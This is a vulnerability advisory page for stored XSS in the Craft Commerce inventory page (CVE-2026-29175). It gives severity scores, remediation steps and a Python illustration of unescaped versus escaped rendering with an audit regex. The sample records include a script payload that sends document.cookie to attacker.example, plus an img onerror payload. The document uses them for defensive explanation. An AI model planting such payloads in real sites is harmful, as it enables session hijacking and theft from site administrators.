Description
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Stored XSS vulnerabilities exist in the Commerce Inventory page. The Product Title, Variant Title, and Variant SKU fields are rendered without proper HTML escaping, allowing an attacker to execute arbitrary JavaScript when any user (including administrators) views the inventory management page. This vulnerability is fixed in 5.5.3.
Published: 2026-03-10
Score: 8.6 High
EPSS: < 1% Very Low
KEV: No
Impact: Session hijacking via Stored XSS
Action: Patch
AI Analysis

Impact

The vulnerability resides in Craft Commerce, where product titles, variant titles, and variant SKUs displayed on the inventory page are rendered without proper HTML escaping. An attacker can store malicious JavaScript in these fields, which then executes when any user—including administrators—accesses the inventory management screen. The injected script can steal session cookies or hijack the administrator’s session, allowing full control over the ecommerce site. This is a classic stored XSS flaw (CWE-79).

Affected Systems

The affected product is Craft Commerce, the ecommerce plugin for Craft CMS, in every version earlier than 5.5.3. The flaw sits in the inventory page itself rather than in any optional feature, so every deployment running a vulnerable build is exposed regardless of its size. Version 5.5.3 applies proper HTML escaping to the Product Title, Variant Title, and Variant SKU fields.

Risk and Exploitability

The CVSS v4.0 score of 8.6 (AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L) classifies the issue as high severity; the CVSS v3.1 rating is 5.4 (medium). The vector requires low privileges (PR:L) and only passive user interaction (UI:P): the attacker needs an account that can create or edit product or variant data, and the payload fires as soon as a victim, including an administrator, opens the inventory page, with no further action on their part. EPSS puts the probability of exploitation below 1 %, and the CVE is not in the CISA KEV catalog, although the SSVC data recorded in the history below notes a public proof of concept (Exploitation: poc) and total technical impact. Because the victims are the privileged users who operate the control panel, the risk to the confidentiality and integrity of the store is significant, with a smaller effect on availability.

Generated by OpenCVE AI on April 16, 2026 at 09:31 UTC.

Remediation

Fixed in Craft Commerce 5.5.3; see the GitHub advisory GHSA-cfpv-rmpf-f624 listed under Advisories. No workaround other than restricting edit rights is provided.

OpenCVE Recommended Actions

  • Upgrade Craft Commerce to version 5.5.3 or later, which applies proper HTML escaping to the Product Title, Variant Title, and Variant SKU fields on the inventory page.
  • Until the upgrade is applied, restrict which control panel accounts can create or edit products and variants, since the attacker needs only low privileges to plant the payload, and require MFA for all control panel users.
  • Audit existing product and variant records (titles and SKUs) for HTML tags, inline event-handler attributes (on*=), or javascript: URLs written while a vulnerable version was running; the upgrade stops rendering such values as markup but does not remove them from the database.
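As an added illustration that is not Craft Commerce's own code (the plugin is PHP/Twig and the actual inventory template is not reproduced in the advisory), the Python block below shows the mechanism described under Impact and the audit step in the last recommended action: stored values concatenated straight into an inventory row become live markup, the same values rendered through output-time HTML escaping do not, and a scan over stored records flags leftovers from a vulnerable build. The record layout, the sample payloads and the attacker.example host are constructed for the example.

```python
"""Added illustration (not Craft Commerce code): an unescaped inventory row,
the same row with output-time HTML escaping, and an audit pass over stored
product/variant data. Records, payloads and the attacker.example host are
constructed for this example."""
import html
import re

# Field names follow the advisory; the record layout is an assumption.
FIELDS = ("product_title", "variant_title", "sku")

# Constructed inventory records: a benign row, a script payload stored in the
# SKU, and an event-handler payload stored in the variant title.
RECORDS = [
    {"product_title": "Plain Tee", "variant_title": "Medium", "sku": "TEE-M"},
    {"product_title": "Plain Tee", "variant_title": "Large",
     "sku": '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'},
    {"product_title": "Hoodie", "variant_title": '<img src=x onerror="alert(1)">',
     "sku": "HOOD-L"},
]


def render_row_unescaped(rec):
    """Vulnerable pattern: stored values are concatenated straight into markup,
    so a payload planted by a low-privileged editor runs for whoever views it."""
    return "<tr>" + "".join(f"<td>{rec[f]}</td>" for f in FIELDS) + "</tr>"


def render_row_escaped(rec):
    """Hardened pattern: every value is HTML-escaped when rendered. quote=True
    also escapes " and ', so the value is inert inside attribute quotes too."""
    cells = "".join(f"<td>{html.escape(str(rec[f]), quote=True)}</td>" for f in FIELDS)
    return "<tr>" + cells + "</tr>"


def has_injected_tag(rendered):
    """True if the rendered row contains a tag that did not come from the
    renderer itself, i.e. stored data was emitted as live markup."""
    without_own_tags = re.sub(r"</?(?:tr|td)>", "", rendered)
    return "<" in without_own_tags


# Deliberately broad audit pattern for stored values: any tag opener, any
# on*= handler attribute, any javascript: URL. Hits are for human review.
_MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def audit_records(records):
    """Return (record index, field name) for every stored value carrying markup,
    the check the last recommended action calls for on data written while a
    vulnerable version was in use."""
    return [(i, f) for i, rec in enumerate(records)
            for f in FIELDS if _MARKUP_RE.search(str(rec[f]))]


if __name__ == "__main__":
    for rec in RECORDS:
        print("unescaped:", render_row_unescaped(rec))
        print("escaped:  ", render_row_escaped(rec))
    print("audit hits:", audit_records(RECORDS))
```

The escaped renderer still emits the attacker's text (including the literal `onerror=`), but with `<`, `>` and the quotes encoded the browser treats it as data rather than markup, which is exactly the change the 5.5.3 fix makes. The audit pattern is intentionally broad; a legitimate SKU such as "ON=1" would be flagged and should simply be reviewed rather than deleted automatically.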

Advisories
Source: GitHub GHSA
ID: GHSA-cfpv-rmpf-f624
Title: Craft Commerce has multiple Stored XSS in Commerce Inventory Page, Leading to Session Hijacking
History

Wed, 11 Mar 2026 17:00:00 +0000

Type | Values Removed | Values Added
First Time appeared | (none) | Craftcms craft Commerce
CPEs | (none) | cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*
Vendors & Products | (none) | Craftcms craft Commerce
Metrics | (none) | cvssV3_1 {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Wed, 11 Mar 2026 15:15:00 +0000

Type | Values Removed | Values Added
Metrics | (none) | ssvc {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Wed, 11 Mar 2026 12:00:00 +0000

Type | Values Removed | Values Added
First Time appeared | (none) | Craftcms; Craftcms commerce
Vendors & Products | (none) | Craftcms; Craftcms commerce

Tue, 10 Mar 2026 20:15:00 +0000

Type | Values Removed | Values Added
Description | (none) | Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Stored XSS vulnerabilities exist in the Commerce Inventory page. The Product Title, Variant Title, and Variant SKU fields are rendered without proper HTML escaping, allowing an attacker to execute arbitrary JavaScript when any user (including administrators) views the inventory management page. This vulnerability is fixed in 5.5.3.
Title | (none) | Multiple Stored XSS in Commerce Inventory Page Leading to Session Hijacking
Weaknesses | (none) | CWE-79
References | (none) |
Metrics | (none) | cvssV4_0 {'score': 8.6, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-11T14:11:09.100Z

Reserved: 2026-03-04T14:44:00.713Z

Link: CVE-2026-29175

Vulnrichment

Updated: 2026-03-11T14:10:58.284Z

NVD

Status : Analyzed

Published: 2026-03-10T20:16:38.710

Modified: 2026-03-11T16:56:41.960

Link: CVE-2026-29175

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-16T09:45:31Z

Weaknesses